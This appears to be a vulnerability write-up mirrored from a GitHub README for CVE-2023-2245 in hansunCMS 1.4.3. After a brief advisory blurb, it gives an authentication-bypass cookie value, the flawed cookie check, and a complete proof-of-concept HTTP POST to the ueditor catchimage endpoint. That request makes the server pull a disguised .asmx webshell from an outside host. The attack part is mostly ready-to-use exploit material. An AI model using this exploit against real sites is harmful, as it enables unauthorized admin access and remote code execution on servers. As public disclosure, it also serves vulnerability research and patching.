Headline
CVE-2023-2245: hansuncmswebshell/README.md at main · MorStardust/hansuncmswebshell
A vulnerability was found in hansunCMS 1.4.3. It has been declared as critical. This vulnerability affects unknown code of the file /ueditor/net/controller.ashx?action=catchimage. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-227230 is the identifier assigned to this vulnerability.
hansuncmswebshell
hansuncms Authentication Bypass and File Upload
hansuncms
Authentication Bypass cookies add AdminUser=AdminId=3B17A20D0B04694C&AdminUser=A5D8190690DE7EC5&AdminPwd=28AF506D68AA3AB1A8F5136675B903480F3C4A24DA67438014A80335E37AD6534880AD891A5A15A1&AdminName=A5D8190690DE7EC5&Language=30;ASP.NET_SessionId=hlz4zjbvx0dze5haljxdxuuk
webshell upload more like CNVD-2017-20077
hansuncms have net 1.4.3 ueditor and Authentication Bypass
some code
if (context.Request.Cookies[“AdminUser”] != null || context.Request.Cookies[“AdminUser”][“SysUser”] != “”)
cookies have AdminUser not null can use ueditor upload webshell
poc
POST /ueditor/net/controller.ashx?action=catchimage HTTP/1.1
Host: xxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: xxxxxx
Connection: close
Referer: http://xxxxxxxx/cms/Login.aspx
Cookie:AdminUser=AdminId=1&AdminUser=1&AdminPwd=1&AdminName=1&Language=30;ASP.NET_SessionId=hlz4zjbvx0dze5haljxdxuuk
Upgrade-Insecure-Requests: 1
source%5B%5D=http%3A%2F%2Fx.x.x.x%2F1.asmx.jpg%3F.asmx